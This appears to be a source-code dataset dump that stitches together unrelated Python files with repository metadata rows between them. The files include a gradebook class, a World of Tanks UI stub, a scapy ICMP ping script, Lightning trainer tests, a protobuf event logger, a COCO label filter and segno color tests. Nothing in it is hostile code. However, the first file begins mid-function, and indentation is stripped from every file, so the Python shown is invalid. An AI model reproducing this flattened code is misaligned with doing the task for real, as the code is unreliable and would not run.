if self.student_enrollments[entry].grade == 'A':
creditpoint = 4
elif self.student_enrollments[entry].grade == 'B':
creditpoint = 3
elif self.student_enrollments[entry].grade == 'C':
creditpoint = 2
elif self.student_enrollments[entry].grade == 'D':
creditpoint = 1
elif self.student_enrollments[entry].grade == 'F':
creditpoint = 0
elif self.student_enrollments[entry].grade == "I":
creditpoint = " "
elif self.student_enrollments[entry].grade == 'W':
creditpoint = " "
else:
creditpoint = " " #Case only when the Grade in an Enrollment hasn't been Updated
if creditpoint != " ":
gradepoint = creditpoint * self.student_enrollments[entry].course.hours
Total_Credit_hours += self.student_enrollments[entry].course.hours
Total_Grade_Point += gradepoint
print(format(self.student_enrollments[entry].course.title, '15'), format(self.student_enrollments[entry].course.hours, "11"), format(creditpoint, '12'), format(gradepoint, '13')," ", format(self.student_enrollments[entry].grade,'5'))
else:
gradepoint = " "
print(format(self.student_enrollments[entry].course.title, '15'), format(self.student_enrollments[entry].course.hours, "11"), format(creditpoint, '12'), format(gradepoint, '13')," ", format(self.student_enrollments[entry].grade,'5'))
print('-' * 60)
print(format(Total_Credit_hours, "26"), format(Total_Grade_Point, "25"))
print( "GPA :", Total_Grade_Point/Total_Credit_hours)
class Gradebook:
def __init__(self):
self.students = {}
#add to student dictionary
s = Student(1, "Carson", "Alexander", "09012005")
self.students[s.student_id] = s
s = Student(2, "Meredith", "Alonso", "09022002")
self.students[s.student_id] = s
s = Student(3, "Arturo", "Anand", "09032003")
self.students[s.student_id] = s
s = Student(4, "Gytis", "Barzdukas", "09012001")
self.students[s.student_id] = s
s = Student(5, "Peggy", "Justice", "09012001")
self.students[s.student_id] = s
s = Student(6, "Laura", "Norman", "09012003")
self.students[s.student_id] = s
s = Student(7, "Nino", "Olivetto", "09012005")
self.students[s.student_id] = s
self.professors = {}
#professor_id first_name last_name hire_date
p = Professor(1, "Kim", "Abercrombie", "1995-03-11")
self.professors[p.professor_id] = p
p = Professor(2, "Fadi", "Fakhouri", "2002-07-06")
self.professors[p.professor_id] = p
p = Professor(3, "Roger", "Harui", "1998-07-01")
self.professors[p.professor_id] = p
p = Professor(4, "Candace", "Kapoor", "2001-01-15")
self.professors[p.professor_id] = p
p = Professor(5, "Roger", "Zheng", "2004-02-12")
self.professors[p.professor_id] = p
self.courses = {}
#add to course dictionary
c = Course(1050, "Chemistry", 3, self.professors[1])
self.courses[c.course_id] = c
c = Course(4022, "Microeconomics", 3, self.professors[2])
self.courses[c.course_id] = c
c = Course(4041, "Macroeconomics", 3, self.professors[3])
self.courses[c.course_id] = c
c = Course(1045, "Calculus", 4, self.professors[4])
self.courses[c.course_id] = c
c = Course(3141, "Trigonometry", 4, self.professors[4])
self.courses[c.course_id] = c
c = Course(2021, "Composition", 3, self.professors[5])
self.courses[c.course_id] = c
c = Course(2042, "Literature", 4, self.professors[5])
self.courses[c.course_id] = c
self.enrollments = {}
#add enrolled students into courses
enroll_id = 11050 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[1], self.courses[1050], " ")
self.enrollments[enroll_id] = enrollment
enroll_id = 14022 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[1], self.courses[4022], " ")
self.enrollments[enroll_id] = enrollment
enroll_id = 14041 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[1], self.courses[4041], " ")
self.enrollments[enroll_id] = enrollment
enroll_id = 21045 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[2], self.courses[1045], " ")
self.enrollments[enroll_id] = enrollment
enroll_id = 23141 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[2], self.courses[3141], " ")
self.enrollments[enroll_id] = enrollment
enroll_id = 22021 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[2], self.courses[4041], " ")
self.enrollments[enroll_id] = enrollment
enroll_id = 31050 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[3], self.courses[1050], " ")
self.enrollments[enroll_id] = enrollment
enroll_id = 41050 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[4], self.courses[1050]," ")
self.enrollments[enroll_id] = enrollment
enroll_id = 44022 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[4], self.courses[4022], " ")
self.enrollments[enroll_id] = enrollment
enroll_id = 54041 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[5], self.courses[2021], " ")
self.enrollments[enroll_id] = enrollment
enroll_id = 61045 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[6], self.courses[1045], " ")
self.enrollments[enroll_id] = enrollment
enroll_id = 73141 #combine student id + chemistry id
enrollment = Enrollment(enroll_id, self.students[7], self.courses[3141], " ")
self.enrollments[enroll_id] = enrollment
| [
"[email protected]"
] | |
34f47be9ef55d3d72a7abc700bc1d17d771fd10e | f82e67dd5f496d9e6d42b4fad4fb92b6bfb7bf3e | /scripts/client/gui/scaleform/daapi/view/meta/serverstatsmeta.py | 4a28fbbfafb863429e1181c69015f9b805026cc8 | [] | no_license | webiumsk/WOT0.10.0 | 4e4413ed4e7b00e22fb85d25fdae9400cbb4e76b | a84f536c73f86d9e8fab559e97f88f99f2ad7e95 | refs/heads/master | 2021-01-09T21:55:00.662437 | 2015-10-23T20:46:45 | 2015-10-23T20:46:45 | 44,835,654 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,339 | py | # Embedded file name: scripts/client/gui/Scaleform/daapi/view/meta/ServerStatsMeta.py
from gui.Scaleform.framework.entities.BaseDAAPIComponent import BaseDAAPIComponent
class ServerStatsMeta(BaseDAAPIComponent):
def getServers(self):
self._printOverrideError('getServers')
def relogin(self, id):
self._printOverrideError('relogin')
def isCSISUpdateOnRequest(self):
self._printOverrideError('isCSISUpdateOnRequest')
def startListenCsisUpdate(self, startListenCsis):
self._printOverrideError('startListenCsisUpdate')
def as_setPeripheryChangingS(self, isChanged):
if self._isDAAPIInited():
return self.flashObject.as_setPeripheryChanging(isChanged)
def as_setServersListS(self, servers):
if self._isDAAPIInited():
return self.flashObject.as_setServersList(servers)
def as_disableRoamingDDS(self, disable):
if self._isDAAPIInited():
return self.flashObject.as_disableRoamingDD(disable)
def as_setServerStatsS(self, stats, tooltipType):
if self._isDAAPIInited():
return self.flashObject.as_setServerStats(stats, tooltipType)
def as_setServerStatsInfoS(self, tooltipFullData):
if self._isDAAPIInited():
return self.flashObject.as_setServerStatsInfo(tooltipFullData)
| [
"[email protected]"
] | |
02a29652ff4002ff213de2e6753b4912bb85ea9e | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_392/ch4_2019_06_05_14_33_33_171155.py | cdcdf2b3d67996003e841afaca8af0a2d1c0ff25 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | def classifica_idade(x):
if x <= 11:
return'crianca'
elif x >= 12 and x <= 17:
return 'adolescente'
else:
return 'adulto'
| [
"[email protected]"
] | |
bfc18eaa66e8178ea1f6ceae0421145d57bb023a | 8821970a489ea190ab7dd6a2da8f672681138543 | /piston/web/__init__.py | acfc64d31c318a7da92d7c776160f900b4897930 | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | grey580/piston | ab293d449728c9fbcc442adc0463135628548deb | 5a3472517e2de14e75eb688cf9335b2c98c3e6f4 | refs/heads/master | 2021-01-09T05:35:52.587268 | 2017-02-02T09:37:50 | 2017-02-02T09:37:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,583 | py | import re
from ..utils import strfdelta, strfage
from ..storage import configStorage as configStore
from .app import app, socketio
from ..steem import SteemConnector
from . import views, assets
import logging
log = logging.getLogger(__name__)
steem = SteemConnector().getSteem()
__ALL__ = [
"app",
"assets",
"forms",
"socketio",
"views",
]
@app.template_filter('age')
def _jinja2_filter_age(date, fmt=None):
""" Format a datatime as age
"""
return strfage(date, fmt)
@app.template_filter('excert')
def _jinja2_filter_datetime(data):
""" Extract an excert of a post
"""
words = data.split(" ")
return " ".join(words[:100])
@app.template_filter('parseBody')
def _jinja2_filter_parseBody(body):
""" Pre-process the body of a post before
showing in the UI
"""
body = re.sub(
r"^(https?:.*/(.*\.(jpg|png|gif))\??.*)",
r"\n\n",
body, flags=re.MULTILINE)
return body
@app.template_filter('currency')
def _jinja2_filter_currency(value):
""" Format the crypto tokens properly
:param float value: The amount to format as string
"""
return "{:,.3f}".format(value)
def run(port, host):
""" Run the Webserver/SocketIO and app
"""
socketio.run(app,
debug=configStore.get("web:debug"),
host=host,
port=port)
# FIXME: Don't use .run()
# from gevent.wsgi import WSGIServer
# from yourapplication import app
# http_server = WSGIServer(('', 5000), app)
# http_server.serve_forever()
| [
"[email protected]"
] | |
34d6d85b02c3b8d0e8734802762acb51523c3fa1 | b56c584ba04de13c7a05f6633893b318eb3fb19d | /课后作业/第五天作业/guoqijun/Chapter 12/scapy_ping_one_new.py | a64b040c34aa4916e5a8141ec9405dfbff24807a | [] | no_license | I318928/Python-Homework | 42133f1291cc3da90293f994ae1a09dce618bdad | 139b450f4bf2e4831688df80c12f43edcc00e468 | refs/heads/master | 2020-06-01T06:53:50.733061 | 2019-04-17T12:12:16 | 2019-04-17T12:12:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 429 | py | #!/usr/bin/env python3
# -*- coding=utf-8 -*-
from scapy.all import *
def qytang_ping(ip):
    """Send a single ICMP echo request to ``ip`` via scapy.

    Returns ``(ip, 1)`` if a reply arrives within 1 second,
    ``(ip, 0)`` otherwise.
    """
    reply = sr1(IP(dst=ip) / ICMP(), timeout=1, verbose=False)
    return (ip, 1) if reply else (ip, 0)
if __name__ == '__main__':
    # Ping one host and print reachability; output strings are Chinese
    # ('通!' = reachable, '不通!' = unreachable) and are kept verbatim.
    result = qytang_ping('192.168.220.129')
    if result[1]:
        print(result[0], '通!')
    else:
        print(result[0], '不通!')
| [
"[email protected]"
] | |
14b05dbce16975b542d6409149a24a4079334f70 | 3b4f985759e44dc169134ae7dcee8e92747c4b01 | /tests/tests_app/components/multi_node/test_trainer.py | 249d7868652bb9800f69f27af8365d32b7063452 | [
"Apache-2.0"
] | permissive | SkafteNicki/pytorch-lightning | 4b09863bf222241ca7128d13df94ff60b71e50aa | 7df627b43746a85aa87671bec3e6dada0d98b556 | refs/heads/master | 2023-07-15T21:20:02.468216 | 2023-05-04T08:12:33 | 2023-05-04T08:12:33 | 248,216,299 | 3 | 1 | Apache-2.0 | 2023-07-10T02:40:24 | 2020-03-18T11:44:20 | Python | UTF-8 | Python | false | false | 3,538 | py | import os
from copy import deepcopy
from functools import partial
from unittest import mock
import pytest
from lightning_utilities.core.imports import module_available
from lightning_utilities.test.warning import no_warning_call
import pytorch_lightning as pl
from lightning.app.components.multi_node.trainer import _LightningTrainerRunExecutor
def dummy_callable(**kwargs):
    """Build a Trainer and return the kwargs captured by the patched __init__."""
    trainer = pl.Trainer(**kwargs)
    return trainer._all_passed_kwargs
def dummy_init(self, **kwargs):
    """Stand-in for ``Trainer.__init__`` that just records its kwargs."""
    self._all_passed_kwargs = kwargs
def _get_args_after_tracer_injection(**kwargs):
    # Patch Trainer.__init__ with the recording stub, then run the executor
    # with a fixed fake cluster topology (7 nodes x 8 procs, node_rank 6,
    # local_rank 0). Returns the kwargs the Trainer ultimately received and
    # a snapshot of os.environ taken after the run (to inspect the
    # MASTER_ADDR / RANK / WORLD_SIZE variables the executor exported).
    with mock.patch.object(pl.Trainer, "__init__", dummy_init):
        ret_val = _LightningTrainerRunExecutor.run(
            local_rank=0,
            work_run=partial(dummy_callable, **kwargs),
            main_address="1.2.3.4",
            main_port=5,
            node_rank=6,
            num_nodes=7,
            nprocs=8,
        )
        env_vars = deepcopy(os.environ)
    return ret_val, env_vars
def check_lightning_pytorch_and_mps():
    """True iff pytorch_lightning is importable and an MPS accelerator exists."""
    if not module_available("pytorch_lightning"):
        return False
    return pl.accelerators.MPSAccelerator.is_available()
@pytest.mark.skipif(not check_lightning_pytorch_and_mps(), reason="pytorch_lightning and mps are required")
@pytest.mark.parametrize("accelerator_given,accelerator_expected", [("cpu", "cpu"), ("auto", "cpu"), ("gpu", "cpu")])
def test_trainer_run_executor_mps_forced_cpu(accelerator_given, accelerator_expected):
    # On MPS-capable machines the executor must force accelerator=cpu
    # (distributed training on MPS is unsupported) and must warn exactly
    # when it actually changed the requested value.
    warning_str = (
        r"Forcing accelerator=cpu as other accelerators \(specifically MPS\) are not supported "
        + "by PyTorch for distributed training on mps capable devices"
    )
    if accelerator_expected != accelerator_given:
        warning_context = pytest.warns(UserWarning, match=warning_str)
    else:
        warning_context = no_warning_call(match=warning_str + "*")
    with warning_context:
        ret_val, env_vars = _get_args_after_tracer_injection(accelerator=accelerator_given)
        assert ret_val["accelerator"] == accelerator_expected
@pytest.mark.parametrize(
    "args_given,args_expected",
    [
        # device/node counts are overridden by the fake cluster topology;
        # spawn strategies are rewritten to their non-spawn equivalents.
        ({"devices": 1, "num_nodes": 1, "accelerator": "gpu"}, {"devices": 8, "num_nodes": 7, "accelerator": "auto"}),
        ({"strategy": "ddp_spawn"}, {"strategy": "ddp"}),
        ({"strategy": "ddp_sharded_spawn"}, {"strategy": "ddp_sharded"}),
    ],
)
@pytest.mark.skipif(not module_available("torch"), reason="PyTorch is not available")
def test_trainer_run_executor_arguments_choices(
    args_given: dict,
    args_expected: dict,
):
    if pl.accelerators.MPSAccelerator.is_available():
        args_expected.pop("accelerator", None)  # Cross platform tests -> MPS is tested separately
    ret_val, env_vars = _get_args_after_tracer_injection(**args_given)
    # Trainer kwargs rewritten by the executor.
    for k, v in args_expected.items():
        assert ret_val[k] == v
    # Torch-distributed environment derived from the topology passed in
    # _get_args_after_tracer_injection (node_rank=6, num_nodes=7, nprocs=8).
    assert env_vars["MASTER_ADDR"] == "1.2.3.4"
    assert env_vars["MASTER_PORT"] == "5"
    assert env_vars["GROUP_RANK"] == "6"
    assert env_vars["RANK"] == str(0 + 6 * 8)
    assert env_vars["LOCAL_RANK"] == "0"
    assert env_vars["WORLD_SIZE"] == str(7 * 8)
    assert env_vars["LOCAL_WORLD_SIZE"] == "8"
    assert env_vars["TORCHELASTIC_RUN_ID"] == "1"
@pytest.mark.skipif(not module_available("lightning"), reason="lightning not available")
def test_trainer_run_executor_invalid_strategy_instances():
    # Spawn-based DDP strategy *instances* (as opposed to strategy strings)
    # are rejected outright by the executor.
    with pytest.raises(ValueError, match="DDP Spawned strategies aren't supported yet."):
        _, _ = _get_args_after_tracer_injection(strategy=pl.strategies.DDPStrategy(start_method="spawn"))
| [
"[email protected]"
] | |
7c0f8ef2e5e76dd512f4593f86eb29756a26e302 | be6e1acc03149aee1ffbdaa315cf8b7d175fffe9 | /event_log.py | 6d347539f3034a82bf2d2298b62c74976e512faf | [
"MIT"
] | permissive | rebcabin/cartpoleplusplus | 763c22d41fc6f13b01a1519da3b51de91cfd03f7 | f986f495755369f571dcbb9a79d21680b916c0f4 | refs/heads/master | 2020-04-05T08:27:28.420983 | 2018-11-24T01:17:47 | 2018-11-24T01:17:47 | 156,716,591 | 0 | 0 | MIT | 2018-11-08T14:10:29 | 2018-11-08T14:10:28 | null | UTF-8 | Python | false | false | 6,521 | py | #!/usr/bin/env python
import event_pb2
import gzip
import matplotlib.pyplot as plt
import numpy as np
import StringIO
import struct
def rgb_to_png(rgb):
    """convert RGB data from render to png"""
    buf = StringIO.StringIO()
    plt.imsave(buf, rgb)
    return buf.getvalue()
def png_to_rgb(png_bytes):
    """convert png (from rgb_to_png) to RGB"""
    # PNG always decodes as RGBA, so slice off the alpha channel.
    rgba = plt.imread(StringIO.StringIO(png_bytes))
    return rgba[:, :, :3]
def read_state_from_event(event):
    """unpack state from event (i.e. inverse of add_state_to_event)"""
    # Two on-disk layouts: pixel episodes carry one PNG per camera per
    # repeat; non-pixel episodes carry (cart_pose, pole_pose) 7-vectors.
    if len(event.state[0].render) > 0:
        # pixel case -> array of shape (H, W, 3, num_cameras, num_repeats)
        num_repeats = len(event.state)
        num_cameras = len(event.state[0].render)
        eg_render = event.state[0].render[0]  # sample render for dimensions
        state = np.empty((eg_render.height, eg_render.width, 3,
                          num_cameras, num_repeats))
        for r_idx in range(num_repeats):
            repeat = event.state[r_idx]
            for c_idx in range(num_cameras):
                png_bytes = repeat.render[c_idx].png_bytes
                state[:,:,:,c_idx,r_idx] = png_to_rgb(png_bytes)
    else:
        # pose case -> array of shape (num_repeats, 2, 7): row 0 cart, row 1 pole
        state = np.empty((len(event.state), 2, 7))
        for i, s in enumerate(event.state):
            state[i][0] = s.cart_pose
            state[i][1] = s.pole_pose
    return state
class EventLog(object):
    """Append-only writer of length-prefixed Episode protobufs.

    Episodes are buffered in ``self.episode_entry`` and flushed to disk on
    the next ``reset()`` call.
    """

    def __init__(self, path, use_raw_pixels):
        self.log_file = open(path, "ab")      # append: existing logs are kept
        self.episode_entry = None             # Episode currently being filled
        self.use_raw_pixels = use_raw_pixels  # pixel renders vs pose vectors

    def reset(self):
        # Flush the finished episode (if any) and start a fresh one.
        if self.episode_entry is not None:
            # *sigh* have to frame these ourselves :/
            # (a header-len prefix will do...)
            buff = self.episode_entry.SerializeToString()
            if len(buff) > 0:
                buff_len = struct.pack('=l', len(buff))
                self.log_file.write(buff_len)
                self.log_file.write(buff)
                self.log_file.flush()
        self.episode_entry = event_pb2.Episode()

    def add_state_to_event(self, state, event):
        """pack state into event"""
        if self.use_raw_pixels:
            # TODO: be nice to have pose info here too in the pixel case...
            # state shape here: (H, W, 3, num_cameras, num_repeats)
            num_repeats = state.shape[4]
            for r_idx in range(num_repeats):
                s = event.state.add()
                num_cameras = state.shape[3]
                for c_idx in range(num_cameras):
                    render = s.render.add()
                    render.width = state.shape[1]
                    render.height = state.shape[0]
                    render.png_bytes = rgb_to_png(state[:,:,:,c_idx,r_idx])
        else:
            # state shape here: (num_repeats, 2, 7); row 0 cart, row 1 pole
            num_repeats = state.shape[0]
            for r in range(num_repeats):
                s = event.state.add()
                s.cart_pose.extend(map(float, state[r][0]))
                s.pole_pose.extend(map(float, state[r][1]))

    def add(self, state, action, reward):
        # Record one (state, action, reward) step in the current episode.
        event = self.episode_entry.event.add()
        self.add_state_to_event(state, event)
        if isinstance(action, int):
            event.action.append(action) # single action
        else:
            assert action.shape[0] == 1 # never log batch operations
            event.action.extend(map(float, action[0]))
        event.reward = reward

    def add_just_state(self, state):
        # Record a state with no action/reward (e.g. the initial state).
        event = self.episode_entry.event.add()
        self.add_state_to_event(state, event)
class EventLogReader(object):
    """Iterate length-prefixed Episode protobufs from a (possibly gzipped) log."""

    def __init__(self, path):
        opener = gzip.open if path.endswith(".gz") else open
        self.log_file = opener(path, "rb")

    def entries(self):
        """Yield each Episode in the log until EOF."""
        episode = event_pb2.Episode()
        while True:
            header = self.log_file.read(4)
            if len(header) == 0:
                return
            (payload_len,) = struct.unpack('=l', header)
            episode.ParseFromString(self.log_file.read(payload_len))
            yield episode
def make_dir(d):
    """Create directory ``d`` (with parents) if it does not exist.

    The original checked ``os.path.exists`` before ``os.makedirs``, which
    races (TOCTOU) with concurrent creators; attempting the creation and
    tolerating an already-existing directory is safe and idempotent.
    """
    try:
        os.makedirs(d)
    except OSError:
        # Re-raise unless the directory now exists (created concurrently
        # or already present).
        if not os.path.isdir(d):
            raise
if __name__ == "__main__":
    # CLI tool (Python 2): dump an event log, optionally echoing episodes to
    # stdout and/or exporting every render to PNG files with debug overlays.
    import argparse, os, sys, Image, ImageDraw
    parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('--log-file', type=str, default=None)
    parser.add_argument('--echo', action='store_true', help="write event to stdout")
    parser.add_argument('--episodes', type=str, default=None,
                        help="if set only process these specific episodes (comma separated list)")
    parser.add_argument('--img-output-dir', type=str, default=None,
                        help="if set output all renders to this DIR/e_NUM/s_NUM.png")
    parser.add_argument('--img-debug-overlay', action='store_true',
                        help="if set overlay image with debug info")
    # TODO args for episode range
    opts = parser.parse_args()
    episode_whitelist = None
    if opts.episodes is not None:
        episode_whitelist = set(map(int, opts.episodes.split(",")))
    if opts.img_output_dir is not None:
        make_dir(opts.img_output_dir)
    total_num_read_episodes = 0
    total_num_read_events = 0
    elr = EventLogReader(opts.log_file)
    for episode_id, episode in enumerate(elr.entries()):
        # Skip episodes not in the whitelist (when one was given).
        if episode_whitelist is not None and episode_id not in episode_whitelist:
            continue
        if opts.echo:
            print "-----", episode_id
            print episode
        total_num_read_episodes += 1
        total_num_read_events += len(episode.event)
        if opts.img_output_dir is not None:
            # One sub-directory per episode, one per camera.
            dir = "%s/ep_%05d" % (opts.img_output_dir, episode_id)
            make_dir(dir)
            make_dir(dir + "/c0") # HACK: assume only max two cameras
            make_dir(dir + "/c1")
            for event_id, event in enumerate(episode.event):
                for state_id, state in enumerate(event.state):
                    for camera_id, render in enumerate(state.render):
                        assert camera_id in [0, 1], "fix hack above"
                        # open RGB png in an image canvas
                        img = Image.open(StringIO.StringIO(render.png_bytes))
                        if opts.img_debug_overlay:
                            canvas = ImageDraw.Draw(img)
                            # draw episode and event number in top left
                            canvas.text((0, 0), "%d %d" % (episode_id, event_id), fill="black")
                            # draw simple fx/fy representation in bottom right...
                            # a bounding box
                            bx, by, bw = 40, 40, 10
                            canvas.line((bx-bw,by-bw, bx+bw,by-bw, bx+bw,by+bw, bx-bw,by+bw, bx-bw,by-bw), fill="black")
                            # then a simple fx/fy line
                            fx, fy = event.action[0], event.action[1]
                            canvas.line((bx,by, bx+(fx*bw), by+(fy*bw)), fill="black")
                        # write it out
                        img = img.resize((200, 200))
                        filename = "%s/c%d/e%05d_r%d.png" % (dir, camera_id, event_id, state_id)
                        img.save(filename)
    print >>sys.stderr, "read", total_num_read_episodes, "episodes for a total of", total_num_read_events, "events"
| [
"[email protected]"
] | |
9c0f49814adb26d4b6bde24af40fb90845ccac80 | d34da4a69ebef62d4b17b8b56f0eca72f0c021e4 | /traffic_sign/subset_coco.py | 4e117ea2e1cf5dff2b36cba086a24552a7c93498 | [] | no_license | gy20073/aws | 91c193e18a15ab4d20acf9d58078bda791b39c38 | 1d73ce215026b1baa91a359628c26edeb59a22ce | refs/heads/master | 2020-03-19T03:55:24.406320 | 2019-10-12T05:35:30 | 2019-10-12T05:35:30 | 135,775,172 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,296 | py | import os
# for each label file, check whether stop sign in it.
# if do, then create new label file with only stop sign, in label dir, and add an entry of this image in the index file
# Configuration: which COCO split to process and where the label/image
# files live. labels_bak holds the original multi-class YOLO labels;
# the filtered single-class (stop sign) labels are written to label_path's
# sibling "labels" directory, and the kept image paths to index_file.
subset="train2014"
label_path = "/scratch/yang/aws_data/coco/labels_bak/" + subset
out_path = "/scratch/yang/aws_data/coco/labels/" + subset
image_prefix = "/scratch/yang/aws_data/coco/images/" + subset
index_file = "/scratch/yang/aws_data/coco/filtered_" + subset + ".txt"
if not os.path.exists(out_path):
    os.mkdir(out_path)
# 11 is stop sign
def filter_stop_sign(fname):
    """Return the stop-sign lines of a YOLO label file, re-labelled.

    Lines whose class id is 11 (stop sign) are kept with the class id
    rewritten to 0; everything else is dropped. Returns a (possibly
    empty) list of newline-terminated label lines.
    """
    with open(fname, "r") as fh:
        all_lines = fh.readlines()
    return ["0 " + line[3:] for line in all_lines if line.startswith("11 ")]
def write_label(oname, filtered):
    """Write the filtered label lines (already newline-terminated) to oname."""
    with open(oname, "w") as fh:
        fh.writelines(filtered)
# For every label file in the split: keep only stop-sign annotations; if any
# remain, write the re-labelled file and record the matching image path.
index = open(index_file, "w")
for file in os.listdir(label_path):
    if file.endswith(".txt"):
        filtered = filter_stop_sign(os.path.join(label_path, file))
        if len(filtered) > 0:
            # save the label
            write_label(os.path.join(out_path, file), filtered)
            # save the image name
            index.write(os.path.join(image_prefix, file.replace(".txt", ".jpg")) + "\n")
index.close()
"[email protected]"
] | |
44b7e6b025a9917ce35e63a322c922264b4455b4 | 5922398212b6e113f416a54d37c2765d7d119bb0 | /python/O(1) Check Power of 2.py | d664954d5d2b872362cab07d682b5469322e34d5 | [] | no_license | CrazyCoder4Carrot/lintcode | e777f73e1fdfe3b8abc9dbfc07d26602bf614151 | 33dcd7f0e2d9bee58840a3370837cb2db82de1eb | refs/heads/master | 2021-01-09T20:38:59.813198 | 2017-01-16T22:34:26 | 2017-01-16T22:34:26 | 60,287,619 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 218 | py | class Solution:
"""
@param n: An integer
@return: True or false
"""
def checkPowerOf2(self, n):
# write your code here
if n == 0:
return False
return n&(n-1) == 0 | [
"[email protected]"
] | |
a0df9ac05e88fad95bd93a42f58be9a0d2994745 | 35b45b5225f911072287b7f0888f4ef4cc70f3d9 | /tests/test_colors.py | 4b316eecdba5bf03008b0ff14ef89c60f50cc7d2 | [
"BSD-3-Clause"
] | permissive | heuer/segno | 54e9b583dbc33b016715bb13f97a9013a37cc9d4 | 11556378fa8949fa5ad6dddbf8cc5f4a667038af | refs/heads/master | 2023-06-21T02:01:45.620206 | 2023-05-02T22:09:31 | 2023-05-02T22:09:31 | 64,920,252 | 441 | 59 | BSD-3-Clause | 2023-06-15T05:00:05 | 2016-08-04T09:08:52 | Python | UTF-8 | Python | false | false | 8,562 | py | # -*- coding: utf-8 -*-
#
# Copyright (c) 2016 - 2022 -- Lars Heuer
# All rights reserved.
#
# License: BSD License
#
"""\
Tests against the colors module.
"""
from __future__ import absolute_import, unicode_literals
import pytest
from segno import writers as colors
def test_illegal():
    # Unknown color name -> ValueError.
    with pytest.raises(ValueError):
        colors._color_to_rgb('unknown')
def test_illegal2():
    # Alpha component out of range (256 > 255) -> ValueError.
    with pytest.raises(ValueError):
        colors._color_to_rgb((1, 2, 3, 256))
def test_illegal3():
    # All RGB components out of range -> ValueError.
    with pytest.raises(ValueError):
        colors._color_to_rgb((300, 300, 300))
def test_illegal4():
    # Single (blue) component out of range -> ValueError.
    with pytest.raises(ValueError):
        colors._color_to_rgb((0, 0, 256))
def test_illegal5():
    # Single (red) component out of range -> ValueError.
    with pytest.raises(ValueError):
        colors._color_to_rgb((256, 0, 0))
def test_rgba_vs_rgb_conflict():
    # An 8-digit hex code carries alpha and is not valid plain-RGB input.
    with pytest.raises(ValueError):
        colors._color_to_rgb('#949494E8')
# Black detection: tuples with a falsy/low alpha are not considered black;
# name matching is case-insensitive.
@pytest.mark.parametrize('clr, expected', [((0, 0, 0, 0), False),
                                           ((0, 0, 0, 1), True),
                                           ((0, 0, 0, 1.0), True),
                                           ((0, 0, 0, 255), True),
                                           ((0, 0, 0, 0.25), False),
                                           ('#000', True),
                                           ('#000000', True),
                                           ('Black', True),
                                           ('black', True),
                                           ('BLACK', True),
                                           ('blacK', True),
                                           ])
def test_color_is_black(clr, expected):
    assert expected == colors._color_is_black(clr)
# White detection mirrors black detection: partial alpha disqualifies,
# hex codes and names match case-insensitively.
@pytest.mark.parametrize('clr, expected', (((255, 255, 255, 0), False),
                                           ((255, 255, 255, 1), True),
                                           ((255, 255, 255, 255), True),
                                           ((255, 255, 255, 1.0), True),
                                           ((255, 255, 255, .0), False),
                                           ((255, 255, 255, .25), False),
                                           ('#FFF', True),
                                           ('#fFF', True),
                                           ('#ffF', True),
                                           ('#fff', True),
                                           ('#ffffff', True),
                                           ('White', True),
                                           ('white', True),
                                           ('WHITE', True),
                                           ('whitE', True),
                                           ))
def test_color_is_white(clr, expected):
    assert expected == colors._color_is_white(clr)
# Web-color serialization: by default the shortest representation wins
# (3-digit hex, or a CSS color name when it is shorter than the hex code);
# alpha values serialize as rgba(...).
@pytest.mark.parametrize('clr, expected', (('black', '#000'),
                                           ('WHite', '#fff'),
                                           ('#000000', '#000'),
                                           ('#ffFFff', '#fff'),
                                           ('#EEeeEE', '#eee'),
                                           ('#F00', 'red'),
                                           ('#FF0000', 'red'),
                                           ('red', 'red'),
                                           ('#d2b48c', 'tan'),
                                           ('tan', 'tan'),
                                           ((0, 0, 0, 1.0), '#000'),
                                           ((255, 255, 255, 1.0), '#fff'),
                                           ((255, 0, 0, 0.25), 'rgba(255,0,0,0.25)'),
                                           ('#0000ffcc', 'rgba(0,0,255,0.8)'),
                                           ('#949494E8', 'rgba(148,148,148,0.91)'),
                                           ))
def test_color_to_webcolor(clr, expected):
    assert expected == colors._color_to_webcolor(clr)
# With optimize=False only fully-opaque black/white collapse to 3-digit
# hex; everything else stays a 6-digit hex code.
@pytest.mark.parametrize('clr, expected', (('black', '#000'),
                                           ('#F00', '#ff0000'),
                                           ('#FF0000', '#ff0000'),
                                           ('red', '#ff0000'),
                                           ('#D2B48C', '#d2b48c'),
                                           ((0, 0, 0, 1.0), '#000'),
                                           ((255, 255, 255, 1.0), '#fff'),
                                           ))
def test_color_to_webcolor_dont_optimize(clr, expected):
    assert expected == colors._color_to_webcolor(clr, optimize=False)
def _make_valid_colornames_data():
data = (
('red', (255, 0, 0)),
('green', (0, 128, 0)),
('blue', (0, 0, 255)),
('Fuchsia', (255, 0, 255)),
('CoRnFloWeRblUe', (100, 149, 237)),
('hOtPink', (255, 105, 180)),
('darkSlateGrey', (47, 79, 79)),
)
for name, expected in data:
yield name, expected
yield name.title(), expected
yield name.upper(), expected
yield name.lower(), expected
# Every casing variant of a known name must resolve to its 3-tuple RGB.
@pytest.mark.parametrize('name, expected', _make_valid_colornames_data())
def test_valid_colornames(name, expected):
    rgb = colors._color_to_rgb(name)
    assert 3 == len(rgb)
